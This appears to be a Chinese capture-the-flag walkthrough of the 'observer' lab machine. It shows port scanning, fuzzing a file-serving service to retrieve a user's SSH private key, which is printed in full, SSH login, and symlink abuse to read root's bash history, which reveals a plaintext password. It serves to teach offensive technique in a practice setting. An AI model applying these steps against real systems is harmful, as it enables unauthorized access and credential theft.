observer

信息搜集

端口扫描

rustscan -a 192.168.0.103 -- -A

				

					
				
				

					
				
				

					
				
				

					
				
			

Open 192.168.0.103:22
Open 192.168.0.103:3333
 
PORT     STATE SERVICE    REASON  VERSION
22/tcp   open  ssh        syn-ack OpenSSH 9.2p1 Debian 2 (protocol 2.0)
| ssh-hostkey: 
|   256 06:c9:a8:8a:1c:fd:9b:10:8f:cf:0b:1f:04:46:aa:07 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBI3o4mI7uASKMmSXi1ktBAkiph60IX52JaKgbuS5hJtX2nGn8JIvaGZjT50iAGX7GdSd7O2uGU6whos6zh1OEMk=
|   256 34:85:c5:fd:7b:26:c3:8b:68:a2:9f:4c:5c:66:5e:18 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIP8MvYrFJd08kv8oTQLwj5p1yOEycvQQBFnStnx4Mred
3333/tcp open  dec-notes? syn-ack
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 200 OK
|     Date: Mon, 15 Apr 2024 06:22:30 GMT
|     Content-Length: 105
|     Content-Type: text/plain; charset=utf-8
|     OBSERVING FILE: /home/nice ports,/Trinity.txt.bak NOT EXIST 
|     <!-- lgTeMaPEZQleQYhYzRyWJjPjzpfRFEHMV -->
|   GenericLines, Help, Kerberos, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Date: Mon, 15 Apr 2024 06:22:05 GMT
|     Content-Length: 78
|     Content-Type: text/plain; charset=utf-8
|     OBSERVING FILE: /home/ NOT EXIST 
|     <!-- XVlBzgbaiCMRAjWwhTHctcuAxhxKQFHMV -->
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Date: Mon, 15 Apr 2024 06:22:05 GMT
|     Content-Length: 78
|     Content-Type: text/plain; charset=utf-8
|     OBSERVING FILE: /home/ NOT EXIST 
|_    <!-- DaFpLSjFbcXoEFfRsWxPLDnJObCsNVHMV -->
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3333-TCP:V=7.94SVN%I=7%D=4/15%Time=661CC781%P=x86_64-pc-linux-gnu%r
SF:(GenericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x
SF:20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Ba
SF:d\x20Request")%r(LPDString,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nCo
SF:ntent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n
SF:\r\n400\x20Bad\x20Request")%r(GetRequest,C3,"HTTP/1\.0\x20200\x20OK\r\n
SF:Date:\x20Mon,\x2015\x20Apr\x202024\x2006:22:05\x20GMT\r\nContent-Length
SF::\x2078\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\n\r\nOBSERVI
SF:NG\x20FILE:\x20/home/\x20NOT\x20EXIST\x20\n\n\n<!--\x20XVlBzgbaiCMRAjWw
SF:hTHctcuAxhxKQFHMV\x20-->")%r(HTTPOptions,C3,"HTTP/1\.0\x20200\x20OK\r\n
SF:Date:\x20Mon,\x2015\x20Apr\x202024\x2006:22:05\x20GMT\r\nContent-Length
SF::\x2078\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\n\r\nOBSERVI
SF:NG\x20FILE:\x20/home/\x20NOT\x20EXIST\x20\n\n\n<!--\x20DaFpLSjFbcXoEFfR
SF:sWxPLDnJObCsNVHMV\x20-->")%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad\x2
SF:0Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection
SF::\x20close\r\n\r\n400\x20Bad\x20Request")%r(Help,67,"HTTP/1\.1\x20400\x
SF:20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nCo
SF:nnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(SSLSessionReq,67,"H
SF:TTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20ch
SF:arset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(Te
SF:rminalServerCookie,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Ty
SF:pe:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\
SF:x20Bad\x20Request")%r(TLSSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Requ
SF:est\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20
SF:close\r\n\r\n400\x20Bad\x20Request")%r(Kerberos,67,"HTTP/1\.1\x20400\x2
SF:0Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nCon
SF:nection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(FourOhFourRequest,DF
SF:,"HTTP/1\.0\x20200\x20OK\r\nDate:\x20Mon,\x2015\x20Apr\x202024\x2006:22
SF::30\x20GMT\r\nContent-Length:\x20105\r\nContent-Type:\x20text/plain;\x2
SF:0charset=utf-8\r\n\r\nOBSERVING\x20FILE:\x20/home/nice\x20ports,/Trinit
SF:y\.txt\.bak\x20NOT\x20EXIST\x20\n\n\n<!--\x20lgTeMaPEZQleQYhYzRyWJjPjzp
SF:fRFEHMV\x20-->");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

				

					
				
				

					
				
				

					
				
				

					
				
			

漏洞发现

踩点

http://192.168.0.103:3333/

				

					
				
				

					
				
				

					
				
				

					
				
			

OBSERVING FILE: /home/ NOT EXIST 
 
<!-- KJyiXJrscctNswYNsGRussVmaozFZBHMV -->

				

					
				
				

					
				
				

					
				
				

					
				
			

fuzz

看来是默认在 home 下了，尝试 fuzz 一下：

┌──(kalikali)-[~/temp/observer]
└─$ locate username 
.........
/usr/share/postgresql/16/extension/insert_username--1.0.sql
/usr/share/postgresql/16/extension/insert_username.control
/usr/share/seclists/Usernames/cirt-default-usernames.txt
/usr/share/seclists/Usernames/mssql-usernames-nansh0u-guardicore.txt
/usr/share/seclists/Usernames/sap-default-usernames.txt
/usr/share/seclists/Usernames/top-usernames-shortlist.txt
/usr/share/seclists/Usernames/xato-net-10-million-usernames-dup.txt
/usr/share/seclists/Usernames/xato-net-10-million-usernames.txt

				

					
				
				

					
				
				

					
				
				

					
				
			

ffuf -w /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -u http://192.168.0.103:3333/FUZZ/.ssh/id_rsa -fw 8 
┌──(kalikali)-[~/temp/observer]
└─$ ffuf -w /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -u http://192.168.0.103:3333/FUZZ/.ssh/id_rsa -fw 8 
 
        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       
 
       v2.1.0-dev
________________________________________________
 
 :: Method           : GET
 :: URL              : http://192.168.0.103:3333/FUZZ/.ssh/id_rsa
 :: Wordlist         : FUZZ: /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response words: 8
________________________________________________
 
jan                     [Status: 200, Size: 2602, Words: 7, Lines: 39, Duration: 1ms]
Marc%20Ludlum           [Status: 200, Size: 101, Words: 9, Lines: 4, Duration: 14ms]
CLEVER%20S              [Status: 200, Size: 98, Words: 9, Lines: 4, Duration: 8ms]
budrick%20              [Status: 200, Size: 98, Words: 9, Lines: 4, Duration: 3ms]
Marc%20Ludlum2000       [Status: 200, Size: 105, Words: 9, Lines: 4, Duration: 7ms]
wigfc/                  [Status: 301, Size: 53, Words: 3, Lines: 3, Duration: 2ms]
wblake25/               [Status: 301, Size: 56, Words: 3, Lines: 3, Duration: 0ms]
tuffy/                  [Status: 301, Size: 53, Words: 3, Lines: 3, Duration: 2ms]
the%20fall              [Status: 200, Size: 98, Words: 9, Lines: 4, Duration: 9ms]
soupy1/                 [Status: 301, Size: 54, Words: 3, Lines: 3, Duration: 2ms]
samuelvw%20             [Status: 200, Size: 99, Words: 9, Lines: 4, Duration: 4ms]
sah1273%20              [Status: 200, Size: 98, Words: 9, Lines: 4, Duration: 7ms]
rude%20dog              [Status: 200, Size: 98, Words: 9, Lines: 4, Duration: 7ms]
peter5%20               [Status: 200, Size: 97, Words: 9, Lines: 4, Duration: 8ms]
paul%20aston            [Status: 200, Size: 100, Words: 9, Lines: 4, Duration: 3ms]
patrice/                [Status: 301, Size: 55, Words: 3, Lines: 3, Duration: 1ms]
mandwee%20              [Status: 200, Size: 98, Words: 9, Lines: 4, Duration: 4ms]
mail%20to               [Status: 200, Size: 97, Words: 9, Lines: 4, Duration: 3ms]
larry%20vanni           [Status: 200, Size: 101, Words: 9, Lines: 4, Duration: 0ms]
lO9ye/                  [Status: 301, Size: 53, Words: 3, Lines: 3, Duration: 8ms]
[WARN] Caught keyboard interrupt (Ctrl-C)

				

					
				
				

					
				
				

					
				
				

					
				
			

ssh -i 登录

尝试访问：

┌──(kalikali)-[~/temp/observer]
└─$ curl http://192.168.0.103:3333/jan/.ssh/id_rsa 
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
 
┌──(kalikali)-[~/temp/observer]
└─$ wget http://192.168.0.103:3333/jan/.ssh/id_rsa
--2024-04-15 02:48:20--  http://192.168.0.103:3333/jan/.ssh/id_rsa
Connecting to 192.168.0.103:3333... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/plain]
Saving to: ‘id_rsa’
 
id_rsa                                    [ <=>                                                                      ]   2.54K  --.-KB/s    in 0s      
 
2024-04-15 02:48:20 (215 MB/s) - ‘id_rsa’ saved [2602]
 
┌──(kalikali)-[~/temp/observer]
└─$ chmod 600 id_rsa                              
 
┌──(kalikali)-[~/temp/observer]
└─$ ssh jan@192.168.0.103 -i id_rsa 
The authenticity of host '192.168.0.103 (192.168.0.103)' can't be established.
ED25519 key fingerprint is SHA256:1DlVfPPtEPOsfNJWynWUBQaV6QyJptlKBRMCdyjuusg.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.0.103' (ED25519) to the list of known hosts.
Linux observer 6.1.0-11-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.38-4 (2023-08-08) x86_64
 
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
 
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Aug 21 20:21:22 2023 from 192.168.0.100
jan@observer:~$

				

					
				
				

					
				
				

					
				
				

					
				
			

拿下用户 jan

提权

信息搜集

jan@observer:~$ sudo -l
Matching Defaults entries for jan on observer:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
 
User jan may run the following commands on observer:
    (ALL) NOPASSWD: /usr/bin/systemctl -l status
jan@observer:~$ ls -la
total 40
drwx------ 4 jan  jan  4096 ago 21  2023 .
drwxr-xr-x 3 root root 4096 ago 21  2023 ..
-rw------- 1 jan  jan   133 ago 21  2023 .bash_history
-rw-r--r-- 1 jan  jan   220 ago 21  2023 .bash_logout
-rw-r--r-- 1 jan  jan  3526 ago 21  2023 .bashrc
drwxr-xr-x 3 jan  jan  4096 ago 21  2023 .local
-rw-r--r-- 1 jan  jan   807 ago 21  2023 .profile
drwx------ 2 jan  jan  4096 ago 21  2023 .ssh
-rw------- 1 jan  jan    24 ago 21  2023 user.txt
-rw------- 1 jan  jan    54 ago 21  2023 .Xauthority
jan@observer:~$ cat user.txt
HMVdDepYxsi8VSucdruB3P7
jan@observer:~$ sudo /usr/bin/systemctl -l status
● observer
    State: running
    Units: 235 loaded (incl. loaded aliases)
     Jobs: 0 queued
   Failed: 0 units
    Since: Mon 2024-04-15 08:15:37 CEST; 34min ago
  systemd: 252.12-1~deb12u1
   CGroup: /
           ├─init.scope
           │ └─1 /sbin/init
           ├─system.slice
           │ ├─cron.service
           │ │ ├─451 /usr/sbin/cron -f
           │ │ ├─459 /usr/sbin/CRON -f
           │ │ ├─467 /bin/sh -c /opt/observer
           │ │ └─468 /opt/observer                 # 有猫腻！
           │ ├─dbus.service
           │ │ └─452 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
           │ ├─ifup@enp0s3.service
           │ │ └─415 dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leas>           │ ├─ssh.service
           │ │ └─472 "sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups"
           │ ├─system-getty.slice
           │ │ └─getty@tty1.service
           │ │   └─463 /sbin/agetty -o "-p -- \\u" --noclear - linux
           │ ├─systemd-journald.service
           │ │ └─206 /lib/systemd/systemd-journald
           │ ├─systemd-logind.service
           │ │ └─460 /lib/systemd/systemd-logind
           │ ├─systemd-timesyncd.service
           │ │ └─266 /lib/systemd/systemd-timesyncd
           │ └─systemd-udevd.service
           │   └─udev
           │     └─237 /lib/systemd/systemd-udevd
           └─user.slice
             └─user-1000.slice
               ├─session-3.scope
               │ ├─531 "sshd: jan [priv]"
               │ ├─546 "sshd: jan@pts/0"
               │ ├─547 -bash
               │ ├─556 sudo /usr/bin/systemctl -l status
               │ ├─557 sudo /usr/bin/systemctl -l status
               │ ├─558 /usr/bin/systemctl -l status
               │ └─559 less
               └─user@1000.service
                 └─init.scope
                   ├─534 /lib/systemd/systemd --user
                   └─536 "(sd-pam)"

				

					
				
				

					
				
				

					
				
				

					
				
			

这次不能直接输入 !/bin/bash 拿下 root 了！

上面的搜集信息中发现定时任务：

/bin/sh -c /opt/observer

				

					
				
				

					
				
				

					
				
				

					
				
			

看一下是个啥：

jan@observer:/opt$ file observer 
observer: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, Go BuildID=_E9thk92IIYCZvNN3nMp/723mDp4suP4oBkI9Ztww/FPlVJZMU8XbDS3SsBTeA/jXmNFAfWVvPiDjPPa-TB, not stripped
jan@observer:/opt$ python3 -V
Python 3.11.2
jan@observer:/opt$ python3 -m http.server 8888
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...
192.168.0.143 - - [15/Apr/2024 08:57:05] "GET /observer HTTP/1.1" 200 -
^C
Keyboard interrupt received, exiting.

				

					
				
				

					
				
				

					
				
				

					
				
			

传过来了，但是分析不了。。。。只能想别的办法了，尝试动态链接一下 root 的私钥试试？

jan@observer:~$ pwd
/home/jan
jan@observer:~$ ls
user.txt
jan@observer:~$ ln -s /root/.ssh/id_rsa root
jan@observer:~$ ls -la
total 40
drwx------ 4 jan  jan  4096 abr 15 09:01 .
drwxr-xr-x 3 root root 4096 ago 21  2023 ..
-rw------- 1 jan  jan   133 ago 21  2023 .bash_history
-rw-r--r-- 1 jan  jan   220 ago 21  2023 .bash_logout
-rw-r--r-- 1 jan  jan  3526 ago 21  2023 .bashrc
drwxr-xr-x 3 jan  jan  4096 ago 21  2023 .local
-rw-r--r-- 1 jan  jan   807 ago 21  2023 .profile
lrwxrwxrwx 1 jan  jan    17 abr 15 09:01 root -> /root/.ssh/id_rsa
drwx------ 2 jan  jan  4096 ago 21  2023 .ssh
-rw------- 1 jan  jan    24 ago 21  2023 user.txt
-rw------- 1 jan  jan    54 ago 21  2023 .Xauthority

				

					
				
				

					
				
				

					
				
				

					
				
			

尝试读取一下，发现不行，尝试链接到.ssh 目录：

jan@observer:~$ ln -s /root/.ssh/id_rsa .ssh/root
jan@observer:~$ cd .ssh
jan@observer:~/.ssh$ ls -la
total 20
drwx------ 2 jan jan 4096 abr 15 09:03 .
drwx------ 4 jan jan 4096 abr 15 09:01 ..
-rw-r--r-- 1 jan jan  566 ago 21  2023 authorized_keys
-rw------- 1 jan jan 2602 ago 21  2023 id_rsa
-rw-r--r-- 1 jan jan  566 ago 21  2023 id_rsa.pub
lrwxrwxrwx 1 jan jan   17 abr 15 09:03 root -> /root/.ssh/id_rsa

				

					
				
				

					
				
				

					
				
				

					
				
			

http://192.168.0.103:3333/jan/.ssh/root

				

					
				
				

					
				
				

					
				
				

					
				
			

OBSERVING FILE: /home/jan/.ssh/root NOT EXIST 
 
<!-- AdIYseMCpRlovFGjLTTvOlrEaEcmbmHMV -->

				

					
				
				

					
				
				

					
				
				

					
				
			

继续尝试：

jan@observer:~$ ln -s /root root
ln: fallo al crear el enlace simbólico 'root': El fichero ya existe
jan@observer:~$ rm root
jan@observer:~$ ln -s /root root

				

					
				
				

					
				
				

					
				
				

					
				
			

但是其他目录就是不行。。。

继续尝试，必须拿到 rootshell！！！

http://192.168.0.103:3333/jan/root/.bash_history

				

					
				
				

					
				
				

					
				
				

					
				
			

ip a
exit
apt-get update && apt-get upgrade
apt-get install sudo
cd
wget https://go.dev/dl/go1.12.linux-amd64.tar.gz
tar -C /usr/local -xzf go1.12.linux-amd64.tar.gz
rm go1.12.linux-amd64.tar.gz 
export PATH=$PATH:/usr/local/go/bin
nano observer.go
go build observer.go 
mv observer /opt
ls -l /opt/observer 
crontab -e
nano root.txt
chmod 600 root.txt 
nano /etc/sudoers
nano /etc/ssh/sshd_config
paswd
fuck1ng0bs3rv3rs
passwd
su jan
nano /etc/issue
nano /etc/network/interfaces
ls -la
exit
ls -la
cat .bash_history
ls -la
ls -la
cat .bash_history
ls -l
cat root.txt 
cd /home/jan
ls -la
cat user.txt 
su jan
reboot
shutdown -h now

				

					
				
				

					
				
				

					
				
				

					
				
			

找到密码，切换用户：

jan@observer:~$ ln -s /root root
jan@observer:~$ su -l root
Contraseña: 
root@observer:~# ls -la
total 52
drwx------  5 root root 4096 abr 15 08:50 .
drwxr-xr-x 18 root root 4096 ago 21  2023 ..
-rw-------  1 root root  633 ago 21  2023 .bash_history
-rw-r--r--  1 root root  571 abr 10  2021 .bashrc
drwxr-xr-x  3 root root 4096 ago 21  2023 .cache
-rw-------  1 root root   38 abr 15 08:50 .lesshst
drwxr-xr-x  3 root root 4096 ago 21  2023 .local
-rw-r--r--  1 root root  913 ago 21  2023 observer.go
-rw-r--r--  1 root root  161 jul  9  2019 .profile
-rw-------  1 root root   24 ago 21  2023 root.txt
-rw-r--r--  1 root root   66 ago 21  2023 .selected_editor
drwx------  2 root root 4096 ago 21  2023 .ssh
-rw-r--r--  1 root root  161 ago 21  2023 .wget-hsts
root@observer:~# cd .ssh
root@observer:~/.ssh# ls -la
total 8
drwx------ 2 root root 4096 ago 21  2023 .
drwx------ 5 root root 4096 abr 15 08:50 ..
root@observer:~/.ssh# cd ..
root@observer:~# cat root.txt 
HMVb6MPDxdYLLC3sxNLIOH1

				

					
				
				

					
				
				

					
				
				

					
				
			

我说咋一直搜不到，原来是没有。。。。。